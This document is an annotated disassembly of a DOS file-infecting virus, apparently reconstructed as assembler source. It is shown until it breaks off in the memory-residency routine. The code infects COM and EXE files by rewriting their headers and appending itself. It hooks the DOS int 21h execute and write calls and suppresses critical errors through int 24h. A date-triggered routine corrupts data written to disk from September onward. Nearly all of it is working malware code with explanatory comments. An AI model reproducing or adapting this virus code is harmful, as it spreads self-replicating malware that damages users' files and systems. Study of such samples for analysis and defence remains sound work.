index_set db 0
|
||||
|
||||
tce_flags dw 0 ;Engines Flags
|
||||
tce_delta dw 0 ;Delta Offset
|
||||
tce_begin dw 0 ;Beginning
|
||||
c_length dw 0
|
||||
end_tce:
@ -0,0 +1,826 @@
seg_a segment byte public
|
||||
assume cs:seg_a, ds:seg_a
|
||||
|
||||
org 100h
|
||||
|
||||
start: mov ax,es ;0100 8C C0
|
||||
add word ptr cs:[d_010C+2],ax ;segment relocation ;0102 2E: 01 06 010E
|
||||
jmp dword ptr cs:[d_010C] ;jump into virus code ;0107 2E: FF 2E 010C
|
||||
|
||||
d_010C dw 0000,0138h ;dword=entry into virus ;010C 0000 0138
|
||||
|
||||
;<- duplicated code (aligning to 20h bytes)
|
||||
db 0B8h,008h,000h,08Eh,0C0h,08Bh,00Eh,041h ;0110 B8 08 00 8E C0 8B 0E 41
|
||||
db 003h,0BAh,028h,000h,02Eh,08Bh,01Eh,09Bh ;0118 03 BA 28 00 2E 8B 1E 9B
|
||||
|
||||
;..............................................................
|
||||
; victim code
|
||||
;..............................................................
|
||||
org 1380h
|
||||
|
||||
|
||||
;============================================================================
|
||||
; Segment aligned virus segment begin
|
||||
;----------------------------------------------------------------------------
|
||||
|
||||
;================================================================
|
||||
; COM virus Entry
|
||||
; (this code is present only in case *.COM infection)
|
||||
;----------------------------------------------------------------
|
||||
l_0000: push ds ;1380 1E
|
||||
push cs ;1381 0E
|
||||
pop ds ;1382 1F
|
||||
lea si,cs:[4F7h] ;d_1877 = saved bytes ;1383 8D 36 04F7
|
||||
mov di,100h ;1387.BF 0100
|
||||
mov cx,20h ;138A B9 0020
|
||||
rep movsb ;restore victim bytes ;138D F3/ A4
|
||||
|
||||
mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;138F 2E: C6 06 0349 FF
|
||||
nop ;1395 90
|
||||
pop ds ;1396 1F
|
||||
lea ax,cs:[54Fh] ;l_18CF ;1397 8D 06 054F
|
||||
jmp ax ;139B FF E0
|
||||
|
||||
;<--- duplicated fields d_033F - d_0347
|
||||
dw 0020 ;139D 20 00
|
||||
dw 05EAh ;139F EA 05
|
||||
dw 0Bh ;13A1 0B 00
|
||||
dw 28h ;13A3 28 00
|
||||
dw 200h ;13A5 00 02
|
||||
db 0 ;13A7 00
|
||||
|
||||
;===========================================================================
|
||||
; Begin of file type independent virus code
|
||||
;---------------------------------------------------------------------------
|
||||
|
||||
;================================================================
|
||||
; Get/Set victim attribute
|
||||
;----------------------------------------------------------------
|
||||
s_13A8 proc near
|
||||
mov dx,offset ds:[57Fh] ;file name ;13A8.BA 057F
|
||||
mov ah,43h ;get/set file attrb ;13AB B4 43
|
||||
int 21h ;13AD CD 21
|
||||
retn ;13AF C3
|
||||
s_13A8 endp
|
||||
|
||||
;================================================================
|
||||
; Move file ptr to EOF
|
||||
;----------------------------------------------------------------
|
||||
s_13B0 proc near
|
||||
xor cx,cx ;13B0 33 C9
|
||||
xor dx,dx ;13B2 33 D2
|
||||
mov ax,4202h ;move file ptr EOF+offset ;13B4 B8 4202
|
||||
mov bx,cs:[9Bh] ;l_141B = file handle ;13B7 2E: 8B 1E 009B
|
||||
int 21h ;13BC CD 21
|
||||
retn ;13BE C3
|
||||
s_13B0 endp
|
||||
|
||||
|
||||
;================================================================
|
||||
; Read 32 bytes into buffer
|
||||
;----------------------------------------------------------------
|
||||
s_13BF proc near
|
||||
mov cx,20h ;13BF B9 0020
|
||||
mov dx,4F7h ;l_1877-sav victim bytes;13C2.BA 04F7
|
||||
mov bx,cs:[9Bh] ;l_141B = file handle ;13C5 2E: 8B 1E 009B
|
||||
mov ah,3Fh ;read file ;13CA B4 3F
|
||||
int 21h ;13CC CD 21
|
||||
mov cx,ax ;bytes read ;13CE 8B C8
|
||||
retn ;13D0 C3
|
||||
s_13BF endp
|
||||
|
||||
;================================================================
|
||||
; Write 32 B into file
|
||||
;----------------------------------------------------------------
|
||||
s_13D1 proc near
|
||||
mov ax,8 ;switch off destruction ;13D1 B8 0008
|
||||
mov es,ax ;13D4 8E C0
|
||||
mov cx,20h ;13D6 B9 0020
|
||||
mov dx,offset ds:[4F7h] ;l_1877 - saved bytes ;13D9.BA 04F7
|
||||
mov bx,cs:[9Bh] ;l_141B = file handle ;13DC 2E: 8B 1E 009B
|
||||
mov ah,40h ;write file cx=bytes ;13E1 B4 40
|
||||
int 21h ;13E3 CD 21
|
||||
mov cx,ax ;13E5 8B C8
|
||||
retn ;13E7 C3
|
||||
s_13D1 endp
|
||||
|
||||
;================================================================
|
||||
; Calculate virus length
|
||||
;----------------------------------------------------------------
|
||||
s_13E8 proc near
|
||||
mov ax,612h ;virus code length ;13E8 B8 0612
|
||||
mov dx,28h ;file type depended code;13EB BA 0028
|
||||
sub ax,dx ;13EE 2B C2
|
||||
mov ds:[341h],ax ;l_16C1 const vcode len ;13F0 A3 0341
|
||||
retn ;13F3 C3
|
||||
s_13E8 endp
|
||||
|
||||
;================================================================
|
||||
; Get/Set file daye & time
|
||||
;----------------------------------------------------------------
|
||||
s_13F4 proc near
|
||||
mov bx,ds:[9Bh] ;l_141B = file handle ;13F4 8B 1E 009B
|
||||
mov ah,57h ;get/set file date & time ;13F8 B4 57
|
||||
int 21h ;13FA CD 21
|
||||
retn ;13FC C3
|
||||
s_13F4 endp
|
||||
|
||||
;================================================================
|
||||
; Contamine File - master routine
|
||||
;----------------------------------------------------------------
|
||||
s_13FD proc near
|
||||
mov byte ptr ds:[349h],0 ;d_16C9 (000h = EXE) ;13FD C6 06 0349 00
|
||||
nop ;1402 90
|
||||
mov al,0 ;1403 B0 00
|
||||
call s_13A8 ;Get victim attribute ;1405 E8 FFA0
|
||||
jc l_146A ;-> EXIT ;1408 72 60
|
||||
mov ds:[33Fh],cx ;l_16BF oryg. file attr ;140A 89 0E 033F
|
||||
mov cx,20h ;140E B9 0020
|
||||
mov al,1 ;1411 B0 01
|
||||
call s_13A8 ;Set victim attribute ;1413 E8 FF92
|
||||
jc l_146A ;-> EXIT ;1416 72 52
|
||||
jmp short l_1421 ;1418 EB 07
|
||||
nop ;141A 90
|
||||
|
||||
d_009B dw 0005h ;file handle ;141B 05 00
|
||||
d_009D dw 0400h ;141D 00 04
|
||||
d_009F dw 057Fh ;filepath address ;141F 7F 05
|
||||
|
||||
l_1421: mov word ptr cs:[9Fh],057Fh ;l_141F := offset l_18FF;1421 2E C7 06 9F 00 7F 05
|
||||
mov dx,ds:[9Fh] ;l_141F - file name ;1428 8B 16 009F
|
||||
mov ax,400h ;142C B8 0400
|
||||
mov ds:[9Dh],ax ;l_141D ;142F A3 009D
|
||||
mov al,2 ;1432 B0 02
|
||||
mov ah,3Dh ;open file, al=mode ;1434 B4 3D
|
||||
int 21h ;1436 CD 21
|
||||
mov word ptr ds:[9Bh],0FFFFh ;l_141B = file handle ;1438 C7 06 009B FFFF
|
||||
jc l_1443 ;143E 72 03
|
||||
mov ds:[9Bh],ax ;l_141B = file handle ;1440 A3 009B
|
||||
l_1443: mov ax,ds:[9Bh] ;l_141B = file handle ;1443 A1 009B
|
||||
cmp ax,0FFFFh ;1446 3D FFFF
|
||||
je l_146A ;-> EXIT, open file err ;1449 74 1F
|
||||
mov al,0 ;144B B0 00
|
||||
call s_13F4 ;Get file daye & time ;144D E8 FFA4
|
||||
jc l_148F ;-> err, close & exit ;1450 72 3D
|
||||
mov ds:[0E8h],dx ;l_1468 = date ;1452 89 16 00E8
|
||||
mov ds:[0EDh],cx ;l_146D = time ;1456 89 0E 00ED
|
||||
call s_13BF ;Read 32 B into buffer ;145A E8 FF62
|
||||
mov ax,word ptr ds:[4F7h] ;l_1877 first file word ;145D A1 04F7
|
||||
cmp ax,5A4Dh ;'MZ' ? ;1460 3D 5A4D
|
||||
je l_146F ;-> yes, EXE ;1463 74 0A
|
||||
jmp l_1616 ;-> no, COM ;1465 E9 01AE
|
||||
|
||||
d_00E8 dw 0EF8h ;victim date ;1468 F8 0E
|
||||
|
||||
l_146A: jmp l_15C6 ;146A E9 0159
|
||||
|
||||
d_00ED dw 0001h ;victim time ;146D 01 00
|
||||
|
||||
;================================================================
|
||||
; EXE file contamination
|
||||
;----------------------------------------------------------------
|
||||
l_146F: mov ax,word ptr ds:[509h] ;+12h = negative sum ;146F A1 0509
|
||||
neg ax ;1472 F7 D8
|
||||
cmp ax,word ptr ds:[4F9h] ;+2 = last page bytes ;1474 3B 06 04F9
|
||||
je l_148F ;-> allready infected ;1478 74 15
|
||||
mov ax,word ptr ds:[4FBh] ;+4 = pages in file ;147A A1 04FB
|
||||
cmp ax,3 ;147D 3D 0003
|
||||
jb l_148F ;-> file to small ;1480 72 0D
|
||||
mov ax,word ptr ds:[4FFh] ;+8 = size of hdr (para);1482 A1 04FF
|
||||
mov cl,4 ;1485 B1 04
|
||||
shl ax,cl ;1487 D3 E0
|
||||
mov ds:[347h],ax ;l_16C7 = size of header;1489 A3 0347
|
||||
jmp short l_1492 ;148C EB 04
|
||||
nop ;148E 90
|
||||
|
||||
l_148F: jmp l_15A8 ;148F E9 0116
|
||||
|
||||
l_1492: mov ax,word ptr ds:[50Bh] ;+14h = IP ;1492 A1 050B
|
||||
mov word ptr ds:[5B4h],ax ;l_1934 ;1495 A3 05B4
|
||||
mov word ptr ds:[50Bh],28h ;new IP value (l_13A8) ;1498 C7 06 050B 0028
|
||||
call s_13B0 ;Move file ptr to EOF ;149E E8 FF0F
|
||||
push ax ;14A1 50
|
||||
push dx ;14A2 52
|
||||
sub ax,ds:[347h] ;l_16C7=size of header ;14A3 2B 06 0347
|
||||
sbb dx,0 ;14A7 83 DA 00
|
||||
mov word ptr ds:[439h],ax ;l_17B9 ;14AA A3 0439
|
||||
mov word ptr ds:[437h],dx ;l_17B7 ;14AD 89 16 0437
|
||||
cmp dx,0 ;14B1 83 FA 00
|
||||
ja l_14D3 ;-> more then 64KB ;14B4 77 1D
|
||||
cmp ax,word ptr ds:[50Bh] ;+14h = IP ;14B6 3B 06 050B
|
||||
ja l_14D3 ;-> more then 28h length;14BA 77 17
|
||||
|
||||
;<- EXE code length =< 28h
|
||||
mov word ptr ds:[345h],0 ;l_16C5 ;14BC C7 06 0345 0000
|
||||
mov bx,word ptr ds:[50Bh] ;14C2 8B 1E 050B
|
||||
sub bx,ax ;28h - file length ;14C6 2B D8
|
||||
mov ds:[343h],bx ;l_16C3 - aligning bytes;14C8 89 1E 0343
|
||||
mov ds:[513h],bx ;+1Ch = ? ;14CC 89 1E 0513
|
||||
jmp short l_1511 ;14D0 EB 3F
|
||||
nop ;14D2 90
|
||||
|
||||
l_14D3: sub ax,word ptr ds:[50Bh] ;+14h = IP=28h ;14D3 2B 06 050B
|
||||
sbb dx,0 ;14D7 83 DA 00
|
||||
mov ds:[345h],ax ;d_16C5 ;14DA A3 0345
|
||||
and ax,0Fh ;14DD 25 000F
|
||||
cmp ax,0 ;14E0 3D 0000
|
||||
jne l_14F9 ;-> need aligment ;14E3 75 14
|
||||
|
||||
mov word ptr ds:[343h],0 ;d_16C3 - aligning bytes;14E5 C7 06 0343 0000
|
||||
mov ax,ds:[345h] ;d_16C5 ;14EB A1 0345
|
||||
mov cx,10h ;14EE B9 0010
|
||||
div cx ;14F1 F7 F1
|
||||
mov ds:[345h],ax ;d_16C5 - segment of vir;14F3 A3 0345
|
||||
jmp short l_1511 ;14F6 EB 19
|
||||
db 90h ;14F8 90
|
||||
|
||||
;<---- need alignment
|
||||
l_14F9: mov word ptr ds:[343h],10h ;d_16C3 - aligning bytes;14F9 C7 06 0343 0010
|
||||
sub ds:[343h],ax ;d_16C3 - aligning bytes;14FF 29 06 0343
|
||||
mov ax,ds:[345h] ;d_16C5 ;1503 A1 0345
|
||||
mov cx,10h ;1506 B9 0010
|
||||
div cx ;1509 F7 F1
|
||||
add ax,1 ;+ alignment paragraph ;150B 05 0001
|
||||
mov ds:[345h],ax ;d_16C5 - segment of vir;150E A3 0345
|
||||
|
||||
l_1511: mov ax,word ptr ds:[50Dh] ;+ 16h = CS ;1511 A1 050D
|
||||
mov word ptr ds:[5B6h],ax ;d_1936 - victim CS ;1514 A3 05B6
|
||||
mov ax,ds:[345h] ;d_16C5 ;1517 A1 0345
|
||||
mov word ptr ds:[50Dh],ax ;+ 16h = CS ;151A A3 050D
|
||||
push ax ;151D 50
|
||||
mov ax,word ptr ds:[505h] ;+ 0Eh = SS ;151E A1 0505
|
||||
mov word ptr ds:[5A1h],ax ;d_1921 - victim SS ;1521 A3 05A1
|
||||
pop ax ;1524 58
|
||||
mov word ptr ds:[505h],ax ;+ 0Eh = virus SS ;1525 A3 0505
|
||||
mov ax,word ptr ds:[507h] ;+ 10h = SP ;1528 A1 0507
|
||||
mov word ptr ds:[5A3h],ax ;d_1923 victim SP ;152B A3 05A3
|
||||
lea ax,cs:[612h] ;End of virus ;152E 8D 06 0612
|
||||
add ax,1Eh ;virus stack ;1532 05 001E
|
||||
add ax,ds:[343h] ;d_16C3 - aligning bytes;1535 03 06 0343
|
||||
mov word ptr ds:[507h],ax ;virus SP ;1539 A3 0507
|
||||
call s_13E8 ;Calculate virus length ;153C E8 FEA9
|
||||
pop dx ;<- victim EOF ;153F 5A
|
||||
pop ax ;1540 58
|
||||
add ax,ds:[341h] ;l_16C1 const vcode len ;1541 03 06 0341
|
||||
adc dx,0 ;1545 83 D2 00
|
||||
add ax,ds:[343h] ;d_16C3 - aligning bytes;1548 03 06 0343
|
||||
adc dx,0 ;154C 83 D2 00
|
||||
mov cx,200h ;page length ;154F B9 0200
|
||||
div cx ;1552 F7 F1
|
||||
cmp dx,0 ;1554 83 FA 00
|
||||
je l_155A ;1557 74 01
|
||||
inc ax ;1559 40
|
||||
l_155A: mov word ptr ds:[4FBh],ax ;+4 - file len in pages ;155A A3 04FB
|
||||
mov word ptr ds:[4F9h],dx ;+2 - last page length ;155D 89 16 04F9
|
||||
neg dx ;1561 F7 DA
|
||||
mov word ptr ds:[509h],dx ;+12h = negative sum ;1563 89 16 0509
|
||||
mov cx,54Fh ;offset l_18CF-EXE entry;1567 B9 054F
|
||||
mov word ptr ds:[50Bh],cx ;+14h - virus IP ;156A 89 0E 050B
|
||||
cmp word ptr ds:[343h],3 ;d_16C3 - aligning bytes;156E 83 3E 0343 03
|
||||
jb l_1580 ;1573 72 0B
|
||||
|
||||
;<- file begins with jump
|
||||
mov cx,28h ;1575 B9 0028
|
||||
sub cx,ds:[343h] ;d_16C3 - aligning bytes;1578 2B 0E 0343
|
||||
mov word ptr ds:[50Bh],cx ;157C 89 0E 050B
|
||||
|
||||
l_1580: call s_15DF ;Set file pointer to BOF;1580 E8 005C
|
||||
call s_13D1 ;Write 32 B into file ;1583 E8 FE4B
|
||||
jc l_15A8 ;-> error, EXIT ;1586 72 20
|
||||
mov cx,ds:[343h] ;d_16C3 - aligning bytes;1588 8B 0E 0343
|
||||
sub cx,3 ;jmp instruction length ;158C 83 E9 03
|
||||
mov ax,54Fh ;offset l_18CF=EXE entry;158F B8 054F
|
||||
mov bx,28h ;beginning of code ;1592 BB 0028
|
||||
sub ax,bx ;jmp distance ;1595 2B C3
|
||||
add cx,ax ;aligning bytes ;1597 03 C8
|
||||
mov word ptr ds:[54Ch],cx ;l_18CC = jump distance ;1599 89 0E 054C
|
||||
call s_13B0 ;Move file ptr to EOF ;159D E8 FE10
|
||||
call s_15C7 ;Align EOF to paragraphs;15A0 E8 0024
|
||||
jc l_15A8 ;-> error, EXIT ;15A3 72 03
|
||||
call s_15FE ;Write const part of vir;15A5 E8 0056
|
||||
|
||||
;================================================================
|
||||
; End of contamination (common to EXE & COM)
|
||||
;----------------------------------------------------------------
|
||||
l_15A8: mov al,1 ;to set ;15A8 B0 01
|
||||
mov dx,ds:ds:[0E8h] ;d_1468 victim date ;15AA 8B 16 00E8
|
||||
mov cx,ds:ds:[0EDh] ;d_146D victim time ;15AE 8B 0E 00ED
|
||||
call s_13F4 ;Set file daye & time ;15B2 E8 FE3F
|
||||
|
||||
mov bx,ds:[9Bh] ;l_141B = file handle ;15B5 8B 1E 009B
|
||||
mov ah,3Eh ;close file ;15B9 B4 3E
|
||||
int 21h ;15BB CD 21
|
||||
|
||||
mov al,1 ;to set ;15BD B0 01
|
||||
mov cx,ds:[33Fh] ;l_16BF oryg. file attr ;15BF 8B 0E 033F
|
||||
call s_13A8 ;Set victim attribute ;15C3 E8 FDE2
|
||||
|
||||
l_15C6: retn ;15C6 C3
|
||||
|
||||
;================================================================
|
||||
; Align end of file to paragraphs
|
||||
;----------------------------------------------------------------
|
||||
s_15C7: mov ax,8 ;to switch off virus ;15C7 B8 0008
|
||||
mov es,ax ;15CA 8E C0
|
||||
mov cx,ds:[343h] ;l_16C3 - aligning bytes;15CC 8B 0E 0343
|
||||
mov dx,54Bh ;offset d_18CB ;15D0.BA 054B
|
||||
mov bx,cs:[9Bh] ;l_141B = file handle ;15D3 2E: 8B 1E 009B
|
||||
mov ah,40h ;write file ;15D8 B4 40
|
||||
int 21h ;15DA CD 21
|
||||
mov cx,ax ;15DC 8B C8
|
||||
retn ;15DE C3
|
||||
|
||||
;================================================================
|
||||
; Set file pointer to BOF
|
||||
;----------------------------------------------------------------
|
||||
s_15DF: xor cx,cx ;15DF 33 C9
|
||||
xor dx,dx ;15E1 33 D2
|
||||
mov ax,4200h ;move file ptr, cx,dx=offset ;15E3 B8 4200
|
||||
mov bx,cs:[9Bh] ;l_141B = file handle ;15E6 2E: 8B 1E 009B
|
||||
int 21h ;15EB CD 21
|
||||
retn ;15ED C3
|
||||
|
||||
;================================================================
|
||||
; COM virus start code pattern
|
||||
;----------------------------------------------------------------
|
||||
d_026E: mov ax,es ;15EE 8C C0
|
||||
add word ptr cs:[010Ch+2],ax ;15F0 2E: 01 06 010E
|
||||
jmp dword ptr cs:[010Ch] ;15F5 2E: FF 2E 010C
|
||||
d_027A dw 0 ;15FA 00 00
|
||||
d_027C dw 0138h ;15FC 38 01
|
||||
|
||||
;================================================================
|
||||
; Write constant part of virus
|
||||
;----------------------------------------------------------------
|
||||
s_15FE: mov ax,8 ;switch off virus ;15FE B8 0008
|
||||
mov es,ax ;1601 8E C0
|
||||
mov cx,ds:[341h] ;l_16C1 const.code leng.;1603 8B 0E 0341
|
||||
mov dx,28h ;offset l_13A8 - vircode;1607.BA 0028
|
||||
mov bx,cs:[9Bh] ;l_141B = file handle ;160A 2E: 8B 1E 009B
|
||||
mov ah,40h ;write file ;160F B4 40
|
||||
int 21h ;1611 CD 21
|
||||
mov cx,ax ;1613 8B C8
|
||||
retn ;1615 C3
|
||||
|
||||
;================================================================
|
||||
; COM victim contamination
|
||||
;----------------------------------------------------------------
|
||||
l_1616: cmp word ptr ds:[4F9h],12Eh ;BOF+2 ;1616 81 3E 04F9 012E
|
||||
je l_15A8 ;-> contamined, EXIT ;161C 74 8A
|
||||
call s_13B0 ;Move file ptr to EOF ;161E E8 FD8F
|
||||
cmp ax,3E8h ;1000 byte file length ;1621 3D 03E8
|
||||
jb l_169F ;-> bellow, EXIT ;1624 72 79
|
||||
add ax,100h ;add PSP ;1626 05 0100
|
||||
adc dx,0 ;1629 83 D2 00
|
||||
push ax ;162C 50
|
||||
and ax,0Fh ;162D 25 000F
|
||||
mov word ptr ds:[343h],0 ;l_16C3 aligning bytes ;1630 C7 06 0343 0000
|
||||
cmp ax,0 ;1636 3D 0000
|
||||
je l_1645 ;-> para aligned file ;1639 74 0A
|
||||
mov word ptr ds:[343h],10h ;l_16C3 - aligning bytes;163B C7 06 0343 0010
|
||||
sub ds:[343h],ax ;l_16C3 - aligning bytes;1641 29 06 0343
|
||||
l_1645: pop ax ;1645 58
|
||||
add ax,ds:[343h] ;l_16C3 aligning bytes ;1646 03 06 0343
|
||||
adc dx,0 ;164A 83 D2 00
|
||||
cmp dx,0 ;164D 83 FA 00
|
||||
ja l_169F ;-> file to big, EXIT ;1650 77 4D
|
||||
mov cl,4 ;1652 B1 04
|
||||
shr ax,cl ;bytes 2 paragraphs ;1654 D3 E8
|
||||
cmp word ptr ds:[343h],0 ;l_16C3 - aligning bytes;1656 83 3E 0343 00
|
||||
mov ds:[27Ch],ax ;l_15FC virus segment ;165B A3 027C
|
||||
mov word ptr ds:[27Ah],0 ;l_15FA virus entry ;165E C7 06 027A 0000
|
||||
call s_15DF ;Set file pointer to BOF;1664 E8 FF78
|
||||
mov ax,8 ;to switch off virus ;1667 B8 0008
|
||||
mov es,ax ;166A 8E C0
|
||||
mov cx,20h ;bytes to write ;166C B9 0020
|
||||
mov dx,26Eh ;offset l_15EE ;166F.BA 026E
|
||||
mov bx,cs:[9Bh] ;l_141B = file handle ;1672 2E: 8B 1E 009B
|
||||
mov ah,40h ;write file ;1677 B4 40
|
||||
int 21h ;1679 CD 21
|
||||
mov cx,ax ;bytes written ;167B 8B C8
|
||||
call s_13B0 ;Move file ptr to EOF ;167D E8 FD30
|
||||
call s_15C7 ;write aligning bytes ;1680 E8 FF44
|
||||
|
||||
mov ax,8 ;switch off virus ;1683 B8 0008
|
||||
mov es,ax ;1686 8E C0
|
||||
mov cx,28h ;40 bytes ;1688 B9 0028
|
||||
mov dx,322h ;offset l_16A2 ;168B .BA 0322
|
||||
mov bx,cs:[9Bh] ;l_141B = file handle ;168E 2E: 8B 1E 009B
|
||||
mov ah,40h ;write file ;1693 B4 40
|
||||
int 21h ;1695 CD 21
|
||||
mov cx,ax ;bytes written ;1697 8B C8
|
||||
call s_13E8 ;Calculate virus length ;1699 E8 FD4C
|
||||
call s_15FE ;Write const part of vir;169C E8 FF5F
|
||||
l_169F: jmp l_15A8 ;close files, EXIT ;169F E9 FF06
|
||||
s_13FD endp
|
||||
|
||||
;<-- COM type virus begin pattern
|
||||
d_0322: push ds ;16A2 1E
|
||||
push cs ;16A3 0E
|
||||
pop ds ;16A4 1F
|
||||
lea si,cs:[4F7h] ;16A5 8D 36 04F7
|
||||
mov di,0100h ;16A9.BF 0100
|
||||
mov cx,20h ;16AC B9 0020
|
||||
rep movsb ;16AF F3/ A4
|
||||
mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;16B1 2E: C6 06 0349 FF
|
||||
nop ;16B7 90
|
||||
pop ds ;16B8 1F
|
||||
lea ax,cs:[54Fh] ;16B9 8D 06 054F
|
||||
jmp ax ;16BD FF E0
|
||||
|
||||
;------ work area
|
||||
d_033F dw 0020h ;oryg. file attr ;16BF 20 00
|
||||
d_0341 dw 05EAh ;const virus code length;16C1 EA 05
|
||||
d_0343 dw 0Bh ;aligning bytes ;16C3 0B 00
|
||||
d_0345 dw 28h ;16C5 28 00
|
||||
d_0347 dw 200h ;size of header ;16C7 00 02
|
||||
d_0349 db 0 ;0=EXE, 0FFh=COM ;16C9 00
|
||||
|
||||
;================================================================
|
||||
; init registers
|
||||
;----------------------------------------------------------------
|
||||
s_16CA proc near
|
||||
xor si,si ;16CA 33 F6
|
||||
xor di,di ;16CC 33 FF
|
||||
xor ax,ax ;16CE 33 C0
|
||||
xor dx,dx ;16D0 33 D2
|
||||
xor bp,bp ;16D2 33 ED
|
||||
retn ;16D4 C3
|
||||
s_16CA endp
|
||||
|
||||
;================================================================
|
||||
; int 24h handling routine (infection time active only)
|
||||
;----------------------------------------------------------------
|
||||
l_16D5: cmp di,0 ;16D5 83 FF 00
|
||||
jne l_16DD ;16D8 75 03
|
||||
mov al,3 ;ignore ;16DA B0 03
|
||||
iret ;16DC CF
|
||||
|
||||
l_16DD: jmp dword ptr cs:[362h] ;L_16E2 = old int 24h ;16DD 2E: FF 2E 0362
|
||||
|
||||
d_0362 dw 0556h,0DF0h ;16E2 56 05 F0 0D
|
||||
|
||||
;================================================================
|
||||
; Get int 24h
|
||||
;----------------------------------------------------------------
|
||||
s_16E6 proc near
|
||||
cli ; Disable interrupts ;16E6 FA
|
||||
xor bx,bx ;16E7 33 DB
|
||||
mov es,bx ;16E9 8E C3
|
||||
mov bx,es:[90h] ;int 24h offset ;16EB 26: 8B 1E 0090
|
||||
mov word ptr cs:[362h],bx ;l_16E2 ;16F0 2E: 89 1E 0362
|
||||
mov bx,es:[92h] ;int 24h segment ;16F5 26: 8B 1E 0092
|
||||
mov word ptr cs:[362h+2],bx ;L_16E2+2 ;16FA 2E: 89 1E 0364
|
||||
mov word ptr es:[90h],355h ;offset l_16D5 ;16FF 26: C7 06 0090 0355
|
||||
mov es:[92h],ax ;int 24h segment := CS ;1706 26: A3 0092
|
||||
sti ;170A FB
|
||||
retn ;170B C3
|
||||
s_16E6 endp
|
||||
|
||||
|
||||
;================================================================
|
||||
; Restore int 24h vector
|
||||
;----------------------------------------------------------------
|
||||
s_170C proc near
|
||||
cli ;170C FA
|
||||
xor bx,bx ;170D 33 DB
|
||||
mov es,bx ;170F 8E C3
|
||||
mov bx,word ptr cs:[362h] ;1711 2E: 8B 1E 0362
|
||||
mov es:[90h],bx ;1716 26: 89 1E 0090
|
||||
mov bx,word ptr cs:[362h+2] ;171B 2E: 8B 1E 0364
|
||||
mov es:[92h],bx ;1720 26: 89 1E 0092
|
||||
sti ;1725 FB
|
||||
retn ;1726 C3
|
||||
s_170C endp
|
||||
|
||||
;===============================================================
|
||||
; write handle service routine (destruction routine)
|
||||
;---------------------------------------------------------------
|
||||
s_1727 proc near
|
||||
push ax ;1727 50
|
||||
push bx ;1728 53
|
||||
push cx ;1729 51
|
||||
push dx ;172A 52
|
||||
push es ;172B 06
|
||||
push ds ;172C 1E
|
||||
push si ;172D 56
|
||||
push di ;172E 57
|
||||
mov ax,es ;172F 8C C0
|
||||
cmp ax,8 ;1731 3D 0008
|
||||
je l_1750 ;-> virus contamination ;1734 74 1A
|
||||
cmp bx,4 ;1736 83 FB 04
|
||||
jb l_1750 ;-> BIOS ;1739 72 15
|
||||
mov ah,2Ah ;get date, cx=year, dx=mon/day ;173B B4 2A
|
||||
int 21h ;173D CD 21
|
||||
cmp dh,9 ;september ? ;173F 80 FE 09
|
||||
jb l_1750 ;-> bellow ;1742 72 0C
|
||||
pop di ;1744 5F
|
||||
pop si ;1745 5E
|
||||
pop ds ;1746 1F
|
||||
pop es ;1747 07
|
||||
pop dx ;1748 5A
|
||||
pop cx ;1749 59
|
||||
pop bx ;174A 5B
|
||||
pop ax ;174B 58
|
||||
add dx,0Ah ;shift buffer address ;174C 83 C2 0A
|
||||
retn ;174F C3
|
||||
|
||||
l_1750: pop di ;1750 5F
|
||||
pop si ;1751 5E
|
||||
pop ds ;1752 1F
|
||||
pop es ;1753 07
|
||||
pop dx ;1754 5A
|
||||
pop cx ;1755 59
|
||||
pop bx ;1756 5B
|
||||
pop ax ;1757 58
|
||||
retn ;1758 C3
|
||||
s_1727 endp
|
||||
|
||||
db 16 dup (0) ;not used ;1759 0010[00]
|
||||
|
||||
;================================================================
|
||||
; Load & Execute service routine
|
||||
;----------------------------------------------------------------
|
||||
s_1769 proc near
|
||||
push ax ;1769 50
|
||||
push bx ;176A 53
|
||||
push cx ;176B 51
|
||||
push dx ;176C 52
|
||||
push es ;176D 06
|
||||
push ds ;176E 1E
|
||||
push si ;176F 56
|
||||
push di ;1770 57
|
||||
mov si,dx ;file pathname ;1771 8B F2
|
||||
mov ax,cs ;1773 8C C8
|
||||
mov es,ax ;1775 8E C0
|
||||
mov di,offset ds:[57Fh] ;l_18FF - victim name ;1777.BF 057F
|
||||
mov cx,19h ;177A B9 0019
|
||||
rep movsb ;copy victim name ;177D F3/ A4
|
||||
call s_16E6 ;Get int 24h vector ;177F E8 FF64
|
||||
mov ds,ax ;ds:=cs ;1782 8E D8
|
||||
call s_13FD ;1784 E8 FC76
|
||||
call s_170C ;Restore int 24h vector ;1787 E8 FF82
|
||||
pop di ;178A 5F
|
||||
pop si ;178B 5E
|
||||
pop ds ;178C 1F
|
||||
pop es ;178D 07
|
||||
pop dx ;178E 5A
|
||||
pop cx ;178F 59
|
||||
pop bx ;1790 5B
|
||||
pop ax ;1791 58
|
||||
retn ;1792 C3
|
||||
s_1769 endp
|
||||
|
||||
;================================================================
|
||||
; New int 21h service routine
|
||||
;----------------------------------------------------------------
|
||||
;<---- 10 bytes to identify resident virus
|
||||
d_0413: pushf ;1793 9C
|
||||
cmp ah,40h ;write handle ? ;1794 80 FC 40
|
||||
jne l_179F ;-> no ;1797 75 06
|
||||
call s_1727 ;write handle service routine ;1799 E8 FF8B
|
||||
jmp short l_17A7 ;179C EB 09
|
||||
nop ;179E 90
|
||||
|
||||
l_179F: cmp ah,4Bh ;Load & Execute ? ;179F 80 FC 4B
|
||||
jne l_17A7 ;-> no ;17A2 75 03
|
||||
call s_1769 ;Load & Execute service routine ;17A4 E8 FFC2
|
||||
l_17A7: popf ;17A7 9D
|
||||
|
||||
;================================================================
|
||||
; Execute substituted code and jump into old int 21h service
|
||||
;----------------------------------------------------------------
|
||||
;<- four bytes from int 21h service
|
||||
d_0428: cmp ah,51h ;17A8 80 FC 51
|
||||
d_042B: je l_17B2 ;17AB 74 05
|
||||
jmp dword ptr cs:[547h] ;17AD 2E: FF 2E 0547
|
||||
l_17B2: jmp dword ptr cs:[49Dh] ;17B2 2E: FF 2E 049D
|
||||
|
||||
d_0437 dw 0000h,02A0h ;dword = code length ;17B7 00 00 A0 02
|
||||
|
||||
;================================================================
|
||||
; Make virus resident
|
||||
;----------------------------------------------------------------
|
||||
s_17BB proc near
|
||||
cli ;disable interrupts ;17BB FA
|
||||
push es ;17BC 06
|
||||
lea si,cs:[413h] ;l_1793 ;17BD 8D 36 0413
|
||||
mov di,si ;17C1 8B FE
|
||||
mov cx,9800h ;resident virus segment ;17C3 B9 9800
|
||||
mov es,cx ;17C6 8E C1
|
||||
mov cx,0Ah ;17C8 B9 000A
|
||||
repe cmpsb ;17CB F3/ A6
|
||||
cmp cx,0 ;17CD 83 F9 00
